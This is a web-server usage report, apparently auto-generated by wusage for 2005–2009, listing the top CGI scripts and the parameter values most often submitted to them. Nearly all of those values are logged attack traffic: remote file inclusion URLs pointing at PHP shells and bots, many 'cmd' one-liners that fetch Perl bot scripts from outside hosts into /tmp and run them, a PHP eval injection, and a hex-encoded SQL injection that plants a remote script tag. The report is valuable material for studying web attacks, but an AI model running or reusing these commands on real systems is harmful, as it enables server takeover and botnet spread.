6/13/2005 to 7/2/2009: Top 100 CGI Scripts

Top 10 Parameters with Top 10 values

Script	Total Accesses
//	11,119
Parameters by Submitted Value
	1
Parameter	*
Value	Accesses
zZz_ADOConnection{}eval($_GET[w]);class zZz_ADOConnection{}/ /	1
Parameter	APB_rp
Value	Accesses
http://www.haruuu.com/albanianid.txt?????	3
http://www.beautifulchurch.org/images/main/style.css??	2
http://www.imsrn.fr/images/stories/rocher/thumbnails/robots. txt??	1
Parameter	CONFIG_EXT[ADMIN_PATH]
Value	Accesses
http://www.hagenclauss.de//vwar/convert/.r/bush??	1
Parameter	CONFIG_EXT[LANGUAGES_DIR]
Value	Accesses
http://www.pmachinery.com/uploads/3e83eab0fd962680.jpg??	14
http://www.cyos.co.kr/gallery/readme.txt??	10
http://www.mandlakaziestates.co.za/contact.txt???	2
http://www.vwgolf-club.ru/forum//includes/gif/newid.txt?	2
http://www.ecol-primer.ru/stati//inc/gif/oid.txt??	1
http://oursoultvxq.com/bbs/data/bbs/chi.txt??	1
http://cluster76.bannaipol.org/includes/chi.txt??	1
http://trimedia-online.net/ihmank/id.txt???	1
http://partyanimals.basicrock.de/counter/gif/ok.txt??	1
http://custercountychief.com/includes/js/tabs/info.txt???	1
Parameter	DIR_PREFIX
Value	Accesses
http://www.uk.rug.nl/php/blog-uraad/data/idv6.txt???	2
http://loutreandco.free.fr/Pages/Sondages/db/id1.txt? ?	2
http://c.frey.free.fr/r/editor/id1.txt?? ?	1
http://c.frey.free.fr/r/module/INI/id.txt? ??	1
http://www.r-sauna.ru//assets/cache/id1.txt? ?	1
http://betterchoice.secureserver101.com//assets/export/id1.t xt ?	1
Parameter	DOCUMENT_ROOT
Value	Accesses
http://www.mandlakaziestates.co.za/contact.txt???	5
http://www.kq-china.com/web//plugins/system/id1.txt???	3
http://www.luzaclub.ru/McN/idfx.txt??	3
http://usharewarez.org.uk//log/id.txt???	2
http://www.lazar.ru/manager/processors/copyright.txt???	2
http://www.lazar.ru/manager/processors/readme.txt??	2
http://www.allforweb.co.kr/data/lang/fatal1.txt??	2
http://www.lazar.ru/manager/processors/min.txt?	2
phpshell?	2
http://alwaysdollar.com/portal/frameset/html/inc/elang/db.tx t??	2
Parameter	GALLERY_BASEDIR
Value	Accesses
http://www.cyos.co.kr/gallery/readme.txt??	8
http://www.syahrulazlan.com/login/id.txt???	2
http://www.mandlakaziestates.co.za/contact.txt???	2
http://weko.co.kr/data/file/notice/test.txt?? ??	1
Parameter	GLOBALS
Value	Accesses
	103
Parameter	GLOBALS[binn_include_path]
Value	Accesses
http://release4future.com/images/ranks/list.txt??	2
Parameter	INCLUDE_FOLDER
Value	Accesses
http://www.roldanfsf.com/www/mambots/system/idc.jpg??	6
http://www.cyos.co.kr/gallery/readme.txt??	6
http://www.geocities.com/jembutzmu/31377os.txt?	3
http://plengeh.co.cc/scripts/id1.txt???	2
http://zonadeclientes.com/id1.txt??	2
http://inamsan.kg.kr/emt/id.txt???	1
http://pallmall5.fileave.com/id.txt??	1
http://efeitovisual.com.br/.sys/v6id???	1
http://brandon420.xpg.com.br/bots/id.txt??	1
http://tstk.org//ktmllite/images/upload/sh1.txt????	1
OTHER:	10,901
Script	Total Accesses
/wusage/summary/cgi.html//skin/zero_vote/error.php	9,551
Parameters by Submitted Value
Parameter	/mosConfig_absolute_path
Value	Accesses
http://tukangbecak.com/ban.gif?	1
Parameter
Value	Accesses
	2
Parameter	action
Value	Accesses
	1
Parameter	cmd
Value	Accesses
uname -a; id	35
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	32
id	28
cd /tmp;rm bn.txt;wget http://www.ownedson.110mb.com/bn.txt; fetch http://www.ownedson.110mb.com/bn.txt;lwp-download http ://www.ownedson.110mb.com/bn.txt;curl -O http://www.ownedson .110mb.com/bn.txt;lynx http://www.ownedson.110mb.com/bn.txt; perl bn.txt	24
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	21
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148 .32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf anaozao.txt	21
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	18
cd /tmp;lwp-download http://h1.ripway.com/tsk4/botx2.txt;per l botx2.txt;rm -rf txt	15
cd /tmp;killall perl -9;rm -rf *.txt;GET http://lolzao.pop3. ru/scanz.txt > scanz.txt;perl scanz.txt;rm scanz.txt	13
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http:// pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?	12
Parameter	dir
Value	Accesses
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/ima ges/.asc/www?????????????????????????????	98
http://www.jungo8949.co.kr/tool25.txt?	97
http://usuarios.arnet.com.ar/larry123/safe.txt?	96
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	85
	74
http://www.gumgangfarm.com/shop/data/id.txt?	59
http://216.83.134.89/teste2bot.txt?	52
http://www.freewebs.com/yahwek/phpbot.txt?	49
http://wsteam.net/bt/var.txt?	48
http://www.capsoir.com/images/TRA.txt?	46
Parameter	dirhttp://206.71.148.89/pbot.txt??]
Value	Accesses
	1
Parameter	dirhttp://brutus.altervista.org/php5/insert??
Value	Accesses
	1
Parameter	dirhttp://www.aabbcc.kit.net/vai.txt?
Value	Accesses
	1
Parameter	dirhttp://www.ss3s.org/r57.txt?
Value	Accesses
	1
Parameter	error
Value	Accesses
http://www.codeduc.cl/documentos/id.txt??	2
OTHER:	8,618
Script	Total Accesses
/	7,473
Parameters by Submitted Value
Parameter	//kboard/kboard.php?board
Value	Accesses
notice	2
Parameter	/Packages.php?sourcedir
Value	Accesses
http://h1.ripway.com/slavezero/slavesukses.txt??	1
Parameter	/zero_vote/error.php?dir
Value	Accesses
http://jentshin.new21.org/zboard_eng//data/cmd/inc???	1
Parameter
Value	Accesses
	9
Parameter	';DECLARE @S CHAR(4000);SET @S
Value	Accesses
CAST(0x4445434C415245204054207661726368617228323535292C40432 076617263686172283430303029204445434C415245205461626C655F437 572736F7220435552534F5220464F522073656C65637420612E6E616D652 C622E6E616D652066726F6D207379736F626A6563747320612C737973636 F6C756D6E73206220776865726520612E69643D622E696420616E6420612 E78747970653D27752720616E642028622E78747970653D3939206F72206 22E78747970653D3335206F7220622E78747970653D323331206F7220622 E78747970653D31363729204F50454E205461626C655F437572736F72204 645544348204E4558542046524F4D20205461626C655F437572736F72204 94E544F2040542C4043205748494C4528404046455443485F53544154555 33D302920424547494E20657865632827757064617465205B272B40542B2 75D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736 372697074207372633D22687474703A2F2F777777302E646F7568756E716 E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D2 7272B5B272B40432B275D20776865726520272B40432B27206E6F74206C6 96B6520272725223E3C2F7469746C653E3C736372697074207372633D226 87474703A2F2F777777302E646F756	1
Parameter	;DECLARE @S CHAR(4000);SET @S
Value	Accesses
CAST(0x4445434C415245204054207661726368617228323535292C40432 076617263686172283430303029204445434C415245205461626C655F437 572736F7220435552534F5220464F522073656C65637420612E6E616D652 C622E6E616D652066726F6D207379736F626A6563747320612C737973636 F6C756D6E73206220776865726520612E69643D622E696420616E6420612 E78747970653D27752720616E642028622E78747970653D3939206F72206 22E78747970653D3335206F7220622E78747970653D323331206F7220622 E78747970653D31363729204F50454E205461626C655F437572736F72204 645544348204E4558542046524F4D20205461626C655F437572736F72204 94E544F2040542C4043205748494C4528404046455443485F53544154555 33D302920424547494E20657865632827757064617465205B272B40542B2 75D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736 372697074207372633D22687474703A2F2F777777302E646F7568756E716 E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D2 7272B5B272B40432B275D20776865726520272B40432B27206E6F74206C6 96B6520272725223E3C2F7469746C653E3C736372697074207372633D226 87474703A2F2F777777302E646F7568	1
Parameter
Value	Accesses
http://www.wingraphics.com/calendar/id?	1
Parameter	??????mosConfig_absolute_path
Value	Accesses
http://www.larisco.com/id.txt??	6
http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt? ??	1
Parameter	APB_rp
Value	Accesses
http://www.kimstroy.by//assets/images/super-id.txt???	4
http://www.nw.or.kr/bbs/icon/v6.txt???	2
http://www.geocities.com/nurdiaz33/idq.txt???	1
http://www.nw.or.kr/bbs/icon/tukulid.txt??	1
http://www.eforel.com/ecommerce/images/smilies/help.txt?	1
Parameter	BESIDER
Value	Accesses
http://elitewa.go.ro/copyright.txt??	1
OTHER:	7,440
Script	Total Accesses
/wusage/summary/cgi.html/components/com_galleria/galleria.ht ml.php	7,398
Parameters by Submitted Value
Parameter
Value	Accesses
http://hackangel.xm.com/good.txt?	1
Parameter	cmd
Value	Accesses
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	29
uname -a; id	25
cd /tmp;rm botnet.txt;wget http://nodan.110mb.com/botnet.txt ;fetch http://nodan.110mb.com/botnet.txt;lwp-download http:/ /nodan.110mb.com/botnet.txt;curl -O http://nodan.110mb.com/b otnet.txt;lynx http://nodan.110mb.com/botnet.txt;perl botnet .txt;rm botnet.txt	24
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	22
cd /tmp;rm ng.txt;wget http://www.cer3ja.xpg.com.br/ng.txt;f etch http://www.cer3ja.xpg.com.br/ng.txt;lwp-download http:/ /www.cer3ja.xpg.com.br/ng.txt;curl -O http://www.cer3ja.xpg. com.br/ng.txt;lynx http://www.cer3ja.xpg.com.br/ng.txt;perl ng.txt;rm -rf ng.txt	16
id	15
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http:// pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?	15
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	15
cd /tmp;rm -rf pacote;wget http://br.geocities.com/ozaminha /pacote.txt;lwp-download http://br.geocities.com/ozaminha/pa cote.txt;fetch http://br.geocities.com/ozaminha/pacote.txt;c url -o pacote.txt http://br.geocities.com/ozaminha/pacote.tx t;GET http://br.geocities.com/ozaminha/pacote.txt >pacote.tx t;lynx -source http://br.geocities.com/ozaminha/pacote.txt > pacote.txt;perl pacote.txt;rm -rf pacote.txt	12
cd /tmp;rm bn.txt;wget http://www.ownedson.110mb.com/bn.txt; fetch http://www.ownedson.110mb.com/bn.txt;lwp-download http ://www.ownedson.110mb.com/bn.txt;curl -O http://www.ownedson .110mb.com/bn.txt;lynx http://www.ownedson.110mb.com/bn.txt; perl bn.txt	12
Parameter	list
Value	Accesses
1	31
Parameter	mosConfig_absolute_
Value	Accesses
http://www.lordxpl.xpg.com.br/own.txt????	8
http://www.lordxpl.we.bs/own.txt????	6
http://joaobenner.googlepages.com/script2.txt??	4
	2
http://www.lordxpl.xpg.com.br/xxxx.txt??	1
http://www.lordxpl.xpg.com.br/own.txt??	1
Parameter	mosConfig_absolute_path
Value	Accesses
	2
http://ch3z.max-host.pl/z/z/k.txt?	283
http://ownsirc.googlepages.com/botnet.txt?	98
http://www.jungo8949.co.kr/tool25.txt?	95
	93
http://www.oslutadores.com/?id=23530	70
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/ima ges/.asc/www?????????????????????????????	67
http://www.freewebs.com/yahwek/sete.txt?	64
http://www.?	62
http://www.freewebs.com/yahwek/phpbot.txt?	60
Parameter	mosConfig_absolute_pathhttp://kamloopstutor.com/images/Qe3?
Value	Accesses
	1
Parameter	mosConfig_absolute_pathhttp://www.geocities.com/t0penghit4m/ DXKYTGF-09887/topeng.txt?
Value	Accesses
	1
Parameter	mosconfig_absolute_path
Value	Accesses
	30
http://agatsuma.bestfreewebspace.net/bn	2
Parameter	output
Value	Accesses
notfounderror/components/com_galleria/galleria.html.php?mosC onfig_absolute_path=http://www.vampireunix.net/cmds.txt?	1
Parameter	xroot
Value	Accesses
www.popcorn.de/cmd?	1
OTHER:	6,229
Script	Total Accesses
/wusage/summary/cgi.html/components/com_rsgallery/rsgallery. html.php	6,768
Parameters by Submitted Value
Parameter
Value	Accesses
	2
http://badmus.by.ru/id.txt?	1
Parameter	cmd
Value	Accesses
uname -a; id	28
id	24
cd /tmp;GET http://www.army5.com.br/bot.txt > bot.txt;perl b ot.txt;rm bot.txt	24
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148 .32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf anaozao.txt	20
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	18
cd /tmp;killall perl -9;rm -rf *.txt;GET http://lolzao.pop3. ru/scanz.txt > scanz.txt;perl scanz.txt;rm scanz.txt	15
cd /tmp;wget http://www.freewebs.com/ferinha/ferinha.txt;cur l -O -f http://www.freewebs.com/ferinha/ferinha.txt;lynx -so urce http://www.freewebs.com/ferinha/ferinha.txt;lwp-rget ht tp://www.freewebs.com/ferinha/ferinha.txt;fetch http://www.f reewebs.com/ferinha/ferinha.txt;perl ferinha.txt;rm -rf feri nha.txt	14
cd /tmp;GET http://spr0x.kit.net/bot.txt > bot.txt;perl bot. txt;rm bot.txt	14
cd /tmp;GET http://johncarter.50webs.com/bot.txt > bot.txt;p erl bot.txt;rm bot.txt	13
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	11
Parameter	list
Value	Accesses
1	4
Parameter	mo/www.locations-cotedazur.com/index.php?lg
Value	Accesses
http://www.freewebs.com/h1h1h1/p.txt??	5
http://www.freewebs.com/t420/p.txt??	4
http://www.rj2009.kit.net/ddd.txt?	4
http://www.rj2008.kit.net/p.txt??	3
http://www.freewebs.com/playssonn/p.txt??	3
http://www.rj2009.kit.net/p.txt?	2
http://www.rj2009.kit.net/p.txt??	1
http://www.freewebs.com/quitando/p.txt??	1
http://www.chapolin-ownz.us/inbox.txt?	1
http://www.rj2008.kit.net/perl.txt?	1
Parameter	mosConfig_absolute_
Value	Accesses
http://www.lordxpl.we.bs/own.txt????	4
http://joaobenner.googlepages.com/script2.txt??	3
http://www.lordxpl.xpg.com.br/own.txt????	2
Parameter	mosConfig_absolute_path
Value	Accesses
http://qlzr.host.sk/line.gif?	153
http://dark4ngel.hostinggratisargentina.com/http?	106
http://usuarios.arnet.com.ar/larry123/safe.txt?	105
http://spr0x.kit.net/cmdpriv8/tool25.dat?	92
http://www.jungo8949.co.kr/tool25.txt?	74
http://ownsirc.googlepages.com/botnet.txt?	57
	50
http://www.freewebs.com/yahwek/phpbot.txt?	48
http://www.oslutadores.com/?id=23530	46
http://www.autogas-dortmund.de/index.txt?	45
Parameter	mosConfig_absolute_pathhttp://www.r57.li/c99.txt?
Value	Accesses
	2
Parameter	mosconfig_absolute_path
Value	Accesses
	30
http://agatsuma.bestfreewebspace.net/bn	2
Parameter	s
Value	Accesses
r	2
Parameter	xroot
Value	Accesses
www.popcorn.de/cmd?	1
OTHER:	5,733
Script	Total Accesses
/wusage/summary/cgi.html//components/com_facileforms/facilef orms.frame.php	5,709
Parameters by Submitted Value
Parameter
Value	Accesses
	1
Parameter	cmd
Value	Accesses
cd /tmp;rm bnt.txt;wget http://garyz.110mb.com/bnt.txt;fetch http://garyz.110mb.com/bnt.txt;lwp-download http://garyz.11 0mb.com/bnt.txt;curl -O http://garyz.110mb.com/bnt.txt;lynx http://garyz.110mb.com/bnt.txt;perl bnt.txt	30
cd /tmp;GET http://johncarter.50webs.com/bot.txt > bot.txt;p erl bot.txt;rm bot.txt	24
cd /tmp;GET http://www.army5.com.br/bot.txt > bot.txt;perl b ot.txt;rm bot.txt	22
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	22
cd /tmp;GET http://johncarter.50webs.com/bruxOm4l.txt > brux Om4l.txt;perl bruxOm4l.txt abcase	20
cd /tmp;rm bn.txt;wget http://garyz.110mb.com/bn.txt;fetch h ttp://garyz.110mb.com/bn.txt;lwp-download http://garyz.110mb .com/bn.txt;curl -O http://garyz.110mb.com/bn.txt;lynx http: //garyz.110mb.com/bn.txt;perl bn.txt	17
cd /tmp;rm root.txt;wget www.3sk3nt.kit.net/root.txt;fetch w ww.3sk3nt.kit.net/root.txt;lwp-download www.3sk3nt.kit.net/r oot.txt;curl -O www.3sk3nt.kit.net/root.txt;lynx www.3sk3nt. kit.net/root.txt;perl root.txt	16
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	15
cd /tmp;rm scan.txt;wget http://garyz.110mb.com/scan.txt;fet ch http://garyz.110mb.com/scan.txt;lwp-download http://garyz .110mb.com/scan.txt;curl -O http://garyz.110mb.com/scan.txt; lynx http://garyz.110mb.com/scan.txt;perl scan.txt;rm -rf sc an.txt	14
cd /tmp;GET http://spr0x.kit.net/bot.txt > bot.txt;perl bot. txt;rm bot.txt	14
Parameter	ff_colendar/samplecalendar.php/oneadmin/adminfoot.php?path[d ocroot]
Value	Accesses
http://www.rj2008.kit.net/p.txt??	6
http://www.freewebs.com/h1h1h1/p.txt??	6
http://www.rj2009.kit.net/ddd.txt?	5
http://www.freewebs.com/t420/p.txt??	5
http://www.freewebs.com/b0mb4do1337/p.txt??	4
http://www.freewebs.com/playssonn/p.txt??	4
http://www.digownz.kit.net/pbot1.txt??	4
http://www.rj2009.kit.net/p.txt?	2
http://flaw.we.bs/a.txt?	2
http://www.digownz.kit.net/dq1.txt?	1
Parameter	ff_compath
Value	Accesses
http://spr0x.kit.net/cmdpriv8/tool25.dat?	121
http://ownsirc.googlepages.com/botnet.txt?	83
http://www.lordxpl.xpg.com.br/own.txt?	69
http://www.freewebs.com/yahwek/phpbot.txt?	68
http://www.lordxpl.xpg.com.br/own.txt??	66
http://www.oslutadores.com/?id=23530	58
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	53
http://www.freewebs.com/yahwek/sete.txt?	51
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/ima ges/.asc/www?????????????????????????????	50
	49
Parameter	ff_compathhttp://www.gvnr.xpg.com.br/Hotmail.txt?
Value	Accesses
	1
Parameter	list
Value	Accesses
1	18
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.ritterspektakel-leipzig.de/administrator/can?	1
OTHER:	4,787
Script	Total Accesses
/wusage/summary/cgi.html//include.php	5,014
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	25
uname -a; id	11
id	10
cd /tmp;rm bnt.txt;wget http://garyz.110mb.com/bnt.txt;fetch http://garyz.110mb.com/bnt.txt;lwp-download http://garyz.11 0mb.com/bnt.txt;curl -O http://garyz.110mb.com/bnt.txt;lynx http://garyz.110mb.com/bnt.txt;perl bnt.txt	10
cd /tmp;rm srz.txt;wget http://www.freewebs.com/bl4bl4bl4bl4 /srz.txt;fetch http://www.freewebs.com/bl4bl4bl4bl4/srz.txt; lwp-download http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;cu rl -O http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;lynx http ://www.freewebs.com/bl4bl4bl4bl4/srz.txt;perl srz.txt;rm -rf srz.txt*	8
cd /tmp;rm start.txt;wget http://71.41.190.203/start.txt;fet ch http://71.41.190.203/start.txt;lwp-download http://71.41. 190.203/start.txt;curl -O http://71.41.190.203/start.txt;lyn x http://71.41.190.203/start.txt;perl start.txt;rm -rf start .txt*	8
cd /tmp;killall perl -9;rm -rf *.txt;GET http://murilok.pop3 .ru/RFI3.txt > RFI3.txt;perl RFI3.txt;rm RFI3.txt	6
cd /tmp;wget http://projectyenor2.iespana.es/file234.txt;cur l -O http://projectyenor2.iespana.es/file234.txt;fetch http: //projectyenor2.iespana.es/file234.txt;lynx http://projectye nor2.iespana.es/file234.txt;lwp-download http://projectyenor 2.iespana.es/file234.txt;perl file234.txt??	6
cd /tmp;rm bn.txt;wget http://www.ownedson.110mb.com/bn.txt; fetch http://www.ownedson.110mb.com/bn.txt;lwp-download http ://www.ownedson.110mb.com/bn.txt;curl -O http://www.ownedson .110mb.com/bn.txt;lynx http://www.ownedson.110mb.com/bn.txt; perl bn.txt	6
cd /tmp;rm start.txt;wget http://189.24.38.250:8090/start.tx t;fetch http://189.24.38.250:8090/start.txt;lwp-download htt p://189.24.38.250:8090/start.txt;curl -O http://189.24.38.25 0:8090/start.txt;lynx http://189.24.38.250:8090/start.txt;pe rl start.txt;rm start.txt	5
Parameter	list
Value	Accesses
1	28
Parameter	path[docroot]
Value	Accesses
http://ownsirc.googlepages.com/botnet.txt?	85
http://www.rele.by/files/id.txt?	66
http://www.oslutadores.com/?id=23530	62
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	58
http://www.freewebs.com/yahwek/sete.txt?	56
http://www.freewebs.com/yahwek/phpbot.txt?	55
http://www.jolieloves.com/mori/cmd.txt?	53
http://189.23.251.131/~tiago/new.txt?	52
	44
http://www.lordxpl.xpg.com.br/own.txt??	39
OTHER:	4,321
Script	Total Accesses
/wusage/summary/cgi.html//modules/xfsection/modify.php	4,696
Parameters by Submitted Value
Parameter	caminho
Value	Accesses
marajoara	1
Parameter	cmd
Value	Accesses
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	24
cd /tmp;lwp-download http://h1.ripway.com/tsk4/botx2.txt;per l botx2.txt;rm -rf txt	22
uname -a; id	17
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	14
cd /tmp;lwp-download http://h1.ripway.com/cmdtsk/botx2.txt;p erl botx2.txt;rm -rf txt	13
cd /tmp;wget http://h1.ripway.com/tsk4/botx2.txt;perl botx2. txt;rm -rf txt	10
cd /tmp;lwp-download http://h1.ripway.com/arroba5/botx.txt;p erl botx.txt;rm -rf botx	8
id	7
cd /tmp;wget http://h1.ripway.com/cmdtsk/botx2.txt;perl botx 2.txt;rm -rf txt	7
cd /tmp;rm -rf box.txt;wget http://eep.br/~gpereira/box.txt; fetch http://eep.br/~gpereira/box.txt;lwp-download http://ee p.br/~gpereira/box.txt;curl -O http://eep.br/~gpereira/box.t xt;lynx http://eep.br/~gpereira/box.txt;perl box.txt;rm -rf *.txt	7
Parameter	dir_module
Value	Accesses
http://ownsirc.googlepages.com/botnet.txt?	85
http://www.oslutadores.com/?id=23530	62
http://www.jolieloves.com/mori/cmd.txt?	56
http://www.freewebs.com/yahwek/sete.txt?	52
http://189.23.251.131/~tiago/new.txt?	51
http://h1.ripway.com/tsk4/cmd.txt?	50
http://www.freewebs.com/yahwek/phpbot.txt?	50
	47
http://www.diabinhoinfernal.kit.net/iLeGaiS/tool25.txt?	36
http://lol123.fileave.com/script9.txt??	34
Parameter	list
Value	Accesses
1	26
OTHER:	4,017
Script	Total Accesses
/wusage/summary//	3,662
Parameters by Submitted Value
Parameter	APB_rp
Value	Accesses
http://www.haruuu.com/albanianid.txt?????	2
Parameter	CONFIG_EXT[ADMIN_PATH]
Value	Accesses
http://www.hagenclauss.de//vwar/convert/.r/bush??	1
Parameter	CONFIG_EXT[LANGUAGES_DIR]
Value	Accesses
http://www.cyos.co.kr/gallery/readme.txt??	4
http://trimedia-online.net/ihmank/id.txt???	1
Parameter	GALLERY_BASEDIR
Value	Accesses
http://www.cyos.co.kr/gallery/readme.txt??	2
Parameter	GLOBALS
Value	Accesses
	25
Parameter	INCLUDE_FOLDER
Value	Accesses
http://www.roldanfsf.com/www/mambots/system/idc.jpg??	2
http://www.cyos.co.kr/gallery/readme.txt??	2
http://zonadeclientes.com/id1.txt??	2
http://www.geocities.com/jembutzmu/31377os.txt?	1
http://efeitovisual.com.br/.sys/v6id???	1
http://tstk.org//ktmllite/images/upload/sh1.txt????	1
http://inamsan.kg.kr/emt/id.txt???	1
http://gumansin.com/id.txt??	1
http://pallmall5.fileave.com/id.txt??	1
http://www.snack-bee.de/osy2.txt?	1
Parameter	Itemid
Value	Accesses
	1
	3
12	3
Parameter	REX[INCLUDE_PATH]
Value	Accesses
http://pediatric-neurology-paris.net/media/install_41aca995b 9171/patch/includes/vsc/botid.txt?	4
http://80.24.176.145/time//appserv/file.txt???	2
Parameter	STPHPLIB_DIR
Value	Accesses
http://www.rostop.com/zerocool/id.txt???	1
Parameter	_REQUEST
Value	Accesses
	25
OTHER:	3,575
Script	Total Accesses
/wusage/summary/cgi.html/components/com_phpshop/toolbar.phps hop.html.php	3,465
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	21
id	14
cd /tmp;rm start.txt;wget http://189.24.138.40/start.txt;fet ch http://189.24.138.40/start.txt;lwp-download http://189.24 .138.40/start.txt;curl -O http://189.24.138.40/start.txt;lyn x http://189.24.138.40/start.txt;perl start.txt;rm start.txt	13
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	11
cd /tmp;rm bnt.txt;wget http://garyz.110mb.com/bnt.txt;fetch http://garyz.110mb.com/bnt.txt;lwp-download http://garyz.11 0mb.com/bnt.txt;curl -O http://garyz.110mb.com/bnt.txt;lynx http://garyz.110mb.com/bnt.txt;perl bnt.txt	10
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm sta.txt	9
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148 .32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf anaozao.txt	8
